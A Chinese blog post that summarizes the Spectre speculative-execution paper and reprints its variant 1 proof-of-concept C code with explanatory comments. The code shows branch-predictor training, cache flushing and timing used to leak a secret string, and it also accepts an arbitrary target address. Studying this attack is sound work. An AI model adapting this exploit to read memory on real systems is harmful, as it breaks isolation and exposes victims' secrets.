Spectre Attacks Exploiting Speculative Execution

最新推荐文章于 2024-01-14 11:03:56 发布
最新推荐文章于 2024-01-14 11:03:56 发布
阅读量763 收藏 1
点赞数
分类专栏: computer architecture 文章标签: spectre
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuiliusheng/article/details/83479926
版权

Spectre Attacks: Exploiting Speculative Execution

  1. 幽灵攻击包括诱使受害者推测地执行在正确的程序执行过程中不会发生的操作,并通过一个侧信道攻击将受害者的机密信息泄露给外界。

  2. 针对于幽灵,虽然某些情况下可以使用临时的针对于特定处理器的特定对策,但是完整的解决方案需要对处理器的设计进行修改,以及对指令集体系结构(ISAs)进行更新,以便硬件架构师和软件开发人员对哪些CPU实现的计算状态允许被泄露有一个共同的理解。

  3. 推测式执行是高速CPU使用的一种技术,目的是通过猜测未来可能的执行路径并提前执行其中的指令来提高性能。尤其是当分支指令依赖的数据值不在cache中,此时需要几百个时钟周期才能够获得。此时CPU将会猜测控制流的方向,保存寄存器状态的一个检查点,然后在猜测的路径上运行程序。

    • 尽管推测式执行有可能提高执行效率,但是当分支预测错误时,某些微结构状态已经发生变化,并且没有能够回退到之前的状态

  4. 幽灵可以攻击的处理器:Intel的Ivy Bridge,Haswell,Skylake;AMD Ryzen;ARM的Samsung,Qualcomm

  5. 缓解措施

    • 串行化指令
    • 编译时插入推测执行阻塞指令(blocking instruction)
    • 禁用推测式执行/推测式内存读取

  6. 代码分析

    #include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif


unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];

char *secret = "The Magic Words are Squeamish Ossifrage.";

uint8_t temp = 0;

void victim_function(size_t x)
{
	//array1_size=16
	//x将会是连续固定符合要求的值,然后是一个恶意的地址
	//恶意的地址由于分支预测的问题,将会被执行
	if (x < array1_size)
	{
		//恶意的地址在开始时是按照相对于array1的起始地址给的
		//array1[x]的范围仍旧是0-255,将这个值作为索引乘以512,访问array2
		temp &= array2[array1[x] * 512];
	}
}



#define CACHE_HIT_THRESHOLD (80)


void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2])
{
	static int results[256];
	int tries, i, j, k, mix_i, junk = 0;
	size_t training_x, x;
	register uint64_t time1, time2;
	volatile uint8_t *addr;

	for (i = 0; i < 256; i++)
		//用于纪录探测结果的数组
		results[i] = 0;

	//尝试次数,1000次,最后统计hit/miss的次数
	for (tries = 999; tries > 0; tries--)
	{
		for (i = 0; i < 256; i++)
			//清空用于探测的数组在cache中的元素
			_mm_clflush(&array2[i * 512]);
		
		//array1 size = 16
		training_x = tries % array1_size;
		for (j = 29; j >= 0; j--)
		{
			//将array1_size从cache中清除,以减慢victim中分支的执行
			_mm_clflush(&array1_size);
			for (volatile int z = 0; z < 100; z++) {}

			x = ((j % 6) - 1) & ~0xFFFF;
			x = (x | (x >> 16));
			x = training_x ^ (x & (malicious_x ^ training_x));
			//x的结果为,部分满足分支条件,然后使用内核地址访问,此时分支预测器会认为是要执行的,此时就会出现问题
			/*
				0 0 0 0 0 malicious_x 0 0 0 0 0 malicious_x 0 0 0 0 0 malicious_x 0 0 0 0 0 malicious_x 0 0 0 0 0 malicious_x
				1 1 1 1 1 malicious_x 1 1 1 1 1 malicious_x 1 1 1 1 1 malicious_x 1 1 1 1 1 malicious_x 1 1 1 1 1 malicious_x
				2 2 2 2 2 malicious_x 2 2 2 2 2 malicious_x 2 2 2 2 2 malicious_x 2 2 2 2 2 malicious_x 2 2 2 2 2 malicious_x
				...
			*/
			victim_function(x);
		}

		//根据cache更改之后的状态统计array2中哪些数据被放入到了cache中
		//根据这些数据对应的索引,则可以计算得到实际访问到的内核数据
		for (i = 0; i < 256; i++)
		{
			//mix_i仍旧是0-255的数字,但是顺序被打乱,防止分支预测影响结果
			mix_i = ((i * 167) + 13) & 255;
			addr = &array2[mix_i * 512];
			time1 = __rdtscp((unsigned int*)&junk);
			junk = *addr;
			time2 = __rdtscp((unsigned int*)&junk) - time1;
			//命中,但是当前正确的分支所使用的array1的值也有命中,所以此时需要忽略到这个值
			if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
				results[mix_i]++;
		}

		j = k = -1;
		//寻找results中的最大值和次大值
		//最大值意味着hit的次数最多,即可能性最大
		for (i = 0; i < 256; i++)
		{
			if (j < 0 || results[i] >= results[j])
			{
				k = j;
				j = i;
			}
			else if (k < 0 || results[i] >= results[k])
			{
				k = i;
			}
		}
		//如果最大值比次大值大很多,则意味着会很准确,可以跳出执行
		if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
			break;
	}
	results[0] ^= junk;
	value[0] = (uint8_t)j;
	score[0] = results[j];
	value[1] = (uint8_t)k;
	score[1] = results[k];
}

//malicious 恶意的
int main(int argc, const char **argv)
{
	//将绝对地址转换为相对地址,因为之后是作为array1的索引使用
	size_t malicious_x=(size_t)(secret-(char*)array1);
	
	int i, score[2], len=40;
	uint8_t value[2];

	for (i = 0; i < sizeof(array2); i++)
		array2[i] = 1;
	if (argc == 3)
	{
		sscanf(argv[1], "%x", (void**)(&malicious_x));
		//将绝对地址转换为相对地址,因为之后是作为array1的索引使用
		malicious_x -= (size_t)array1;
		sscanf(argv[2], "%d", &len);
	}

	printf("Reading %d bytes:\n", len);
	while (--len >= 0)
	{
		printf("Reading at malicious_x = %p... ", (void*)malicious_x);
		readMemoryByte(malicious_x++, value, score);
		printf("%s: ", (score[0] >= 2*score[1] ? "Success":"Unclear"));
		printf("0x%02X=%c,score=%d ", value[0],
		       (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
		if (score[1] > 0)
			printf("(second best: 0x%02X score=%d)", value[1], score[1]);
		printf("\n");
	}
	return (0);
}

shuiliusheng
关注
专栏目录
CVE-2024-2193 GHOSTRACE:Exploiting and Mitigating Speculative Race Conditions(推测竞争条件的利用和缓解)ARM安全中心
security²-卢鸿波-安全二次方
03-25 1126
2024年3月,一个研究小组发表了一篇名为《GhostRace: Exploiting and Mitigating Speculative Race Conditions》的论文。该论文演示了一种 Spectre v1 变体,利用内核中的“推测使用后释放(speculative use-after-free)漏洞”来推测性地劫持控制流,并泄露内核内存。这个变体已被分配了CVE-2024-2193编号。
A Systematic Evaluation of Transient Execution Attacks and Defenses (对暂态执行的攻击和防御的系统评估)(前四节)
shuiliusheng的专栏
12-12 1455
A Systematic Evaluation of Transient Execution Attacks and Defenses (对暂态执行的攻击和防御的系统评估)(前四节) 摘要: 异常或者分支错误预测事件可能会在CPU的微体系状态中留下依赖于私有数据的足迹。通过这种观察,导致了新幽灵和熔断攻击变种的扩散。 业界和学术界的问题在于:虽然在寻找有效的防御上,但是这些防御主要是针对于一...
Speculator:A Tool to Analyze Speculative Execution Attacks and Mitigations
shuiliusheng的专栏
12-17 439
Speculator: A Tool to Analyze Speculative Execution Attacks and Mitigations 摘要: 现状:新的推测执行攻击基本上每个月都会出现新的,同时仍旧存在很多未被发现的微体系结构攻击 Speculator:一个新的工具,用于审查新的微体系结构攻击和相应的缓解方法(GDB of speculative execution) 通过...
Spectre Attacks Exploiting Speculative Execution-1
shuiliusheng的专栏
12-16 1159
Spectre Attacks: Exploiting Speculative Execution 摘要: 推测式执行在如何执行方面是不可靠的,因为它可以访问受害者的内存和寄存器,并且可以执行具有可测量的副作用的操作 幽灵攻击:诱导受害者在执行在正确的程序执行过程中不会发生的推测性操作,并通过一个侧信道将受害者的敏感数据泄露出去 论文提出了一种实用的攻击方法,通过结合侧信道攻击,fault攻...
Spectre Attacks: Exploiting Speculative Execution 翻译
weixin_43156135的博客
05-03 1306
spectreabstractI. INTRODUCTIONA.Our ResultsB Our TechniquesC. Targeted Hardware and Current StatusD. MeltdownII. BACKGROUNDA.Out-of-order ExecutionB. Speculative ExecutionC. Branch PredictionD. The Me...
Spectre Attacks: Exploiting Speculative Execution. 2019
diamond_biu的博客
03-18 3595
Spectre Attacks: Exploiting Speculative Execution来源梳理摘要I INTRODUCTIONA. Our resultB. Our TechniquesVariant 1: Exploiting Conditional BranchesVariant 2: Exploiting Indirect BranchesOther VariantsC. Targeted Hardware and Current StatusII. BACKGROUNDA. Out-of
SEEDLAB2.0-Spectre Attack Lab
Yale的博客
04-17 1903
Spectre Attack Lab Spectre在很多现代处理器中都有,比如Intel、AMD,ARM等 该漏洞允许程序突破进程内、进程间的隔离,如此,恶意程序就能从它不能访问的区域读取数据.本来这不应该发生,对于进程间隔离,有硬件保护机制;对于进程内隔离,有软件保护机制,但是CPU设计导致的缺陷使得攻击成为了可能。 注意,对于本实验的大多数代码,当使用gcc编译时都需要加上-march=native,march标志告诉编译器enable本地机器的所有指令子集。 Meltdown和Spectre都是利用
NDA:Preventing Speculative Execution Attacks at Their Source
shuiliusheng的专栏
09-16 326
NDA: Preventing Speculative Execution Attacks at Their Source Main Point & Result Two attacks types BTB side channel attack Four Threat Models Unsafe Instructions Different Unsaf...
javascript,chrome与幽灵攻击---JavaScript,chrome with Spectre Attacks
szengtal的专栏
09-22 1191
&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;nbsp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;nbsp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;nbsp;&amp;amp;amp;amp;amp;amp;amp;a
SeedLab——Spectre Attack Lab
最新发布
Aft3rGl0w的博客
01-14 1054
这样可以最大程度地利用处理器的执行资源,提高指令的并行度,加快程序的执行速度。这样虽然有时能正确预测,但是有些情况下会返回255的错误答案,这是因为restrictedAccess的返回类型为uint8_t,整数溢出了,所以修改restrictedAccess的返回值和spectreAttack中的参数s的类型为int即可。传统的安全防护方法通常关注于保护数据存储和传输的过程,而侧信道攻击则利用了系统在处理数据时产生的其他非直接通信渠道,如时间、功耗、电磁辐射等,来获取有关敏感数据的信息。
Spectre漏洞
yusakul的博客
12-01 1944
漏洞介绍 Spectre的PoC下载地址: https://spectreattack.com/。 Spectre涉及CVE编号为CVE-2017-5754。 虽然我们常见认为CPU访问内存速度很快,但基于CPU运算频率来看,这个访问过程还是非常慢的,CPU访问内存中的数据需要比较长的等待时间,为了提高CPU的性能,它提出了分支预测、预测执行的功能。让CPU再访问内存等待数据时,依然可以进行相对...
从入门到入土:[SEED-Lab]-幽灵攻击|Spectre Attack Lab|详细说明|实验步骤|实验截图
Q_U_A_R_T_E_R的博客
11-24 3060
此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) 本人博客所有文章纯属学习之用,不涉及商业利益。不合适引用,自当删除! 若被用于非法行为,与我本人无关 [SEED-Lab]-Spectre Attack Lab实验环境PDF文件实验步骤环境配置Labsetup操作步骤Tasks 1 and 2: Side Channel Attacks via CPU CachesTask 1: Reading from Cache versu
网络攻防技术——幽灵攻击实验
学习记录
02-28 2232
一、题目 幽灵攻击于2017年发现,并于2018年1月公开披露,它利用关键漏洞进行攻击,存在于许多现代处理器中,包括Intel、AMD和ARM处理器。漏洞允许程序突破进程间和进程内的隔离,以便恶意程序可以读取来自无法访问区域的数据。硬件保护不允许这样的访问机制(用于进程间的隔离)或软件保护机制(用于进程内的隔离),但CPU设计中存在漏洞,可能会破坏保护。因为缺陷存在于硬件中,很难从根本上解决问题,除非更换CPU。幽灵和熔断漏洞代表了CPU设计中的一种特殊类型的漏洞,它们还为安全教育提供了宝贵的一课。 本实验
利用Spectre(幽灵)实现Meltdown攻击
Nozidoali的博客
10-21 664
Meltdown攻击通过利用Intel微处理器结构的设计缺陷,通过乱序执行时的计算痕迹建立信道,从而实现越界访问,进而攻击内核空间的地址。然而朴素的Meltdown攻击由于会频繁触发缺页错误,导致攻击程序提前退出,无法持续的对靶地址进行持续的访问。在这篇笔记中,主要介绍第三种处理异常退出攻击的方式:Spectre(幽灵)攻击。具体的说,通过处理器分支预测算法的设计缺陷,在错误的分支预测被系统发现之前的间隙,完成meltdown攻击。
lab12——幽灵攻击
(∪.∪ )...zzz的博客
12-23 1162
这里写自定义目录标题一、熔断 幽灵攻击1. 信道攻击2. 缓存记忆秘密3. 熔断攻击二、Task 1: Reading from Cache versus from MemoryTask 2: Using Cache as a Side ChannelTask 3: Out-of-Order Execution and Branch Prediction 一、熔断 幽灵攻击 1. 信道攻击 CPU和内存之间增加缓存Cache可显著提升程序的平均执行性能 若CPU访问Cache中并不存在数据,产生时间延迟,
【SEED】网络攻防--幽灵攻击
qq_64389397的博客
01-07 487
可以看到,程序也没有成功执行分支预测,这是因为将传入的值修改为20-29之后,分支语句多次执行false,导致训练的结果是CPU会预测执行false语句,所以没有执行我们想要的分支。尝试修改usleep()的值为,100,1000,10000,可以看到,hit的值开始降低,因为时间变长之后,判断语句可能已经返回结果,不需要进行分支预测。可以看到,代码没有执行预测分支,这是因为缓存中的size数据没有被清除,导致程序直接访问缓存非常迅速,没有执行分支预测的时间。取消掉注释,将训练的代码修改为如下代码。
技术分享 | 幽灵攻击与编译器中的消减方法介绍
openEuler_的博客
09-23 383
2本文介绍的幽灵攻击,它利用了投机执行违反这一假设的事实。实际攻击的示例不需要任何软件漏洞,并允许攻击者读取私有内存并从其他进程和安全上下文注册内容。软件安全性从根本上取决于硬件和软件开发人员之间对CPU实现允许(和不允许)从计算中暴露哪些信息有明确的共识。因此,虽然文中描述的对策可能有助于在短期内限制攻击,但它们只是权宜之计,因为最好有正式的体系结构保证,以确定任何特定代码构建在当今的处理器中是否安全。因此,长期解决方案将需要从根本上改变指令集体系结构。更广泛地说,安全性和性能之间存在权衡。
Meltdown attack and Spectre attack的区别
博客标题
01-09 2329
Meltdown attack and Spectre attack的区别 Meltdown和Spectre常一并提起,两者有相同之处,但差异也是很明显的。记录下来做个笔记吧。 两者都运用了speculation execution技术,但是Meltdown偏向于Out of order(OOO),而Spectre偏向于 Branch prediction。 《Spectre Attac
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值